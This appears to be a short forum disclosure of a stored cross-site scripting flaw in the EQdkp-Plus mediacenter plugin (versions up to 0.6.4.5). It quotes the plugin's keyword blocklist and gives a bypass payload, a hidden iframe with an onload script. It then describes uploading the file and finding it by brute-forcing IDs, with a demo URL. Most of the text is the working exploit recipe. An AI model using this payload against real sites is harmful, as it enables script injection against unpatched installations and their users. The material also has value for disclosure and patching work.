[code=plugins/mediacenter/include/mediacenter.class.php:421]
function check_content($fieldname){
$disallowed = "body|head|html|img|plaintext|a href|pre|script|table|title|php";
$disallowed_content = explode('|', $disallowed);
if (empty($disallowed_content))
{
return false;
}
[/code]
To get around this, you can use the Next design:
Code:
<iframe src="http://yandex.ru" style="display: none" onload="alert('XSS')">
</iframe>
After downloading the file to the server, you can find the file on request:
http://site.com/dkp/plugins/mediacen...p?mode=ajax&id = [ID].
[ID] - simple exhaustive search.
Example:
http://www.eqdkp-plus.com/demo06/dat...a3825c2494f2/m
ediacenter/thumbs_b/ee5bb2c59c237307d61bcb0bae1e08f2.htm
Vulnerable versions: <=0.6.4.5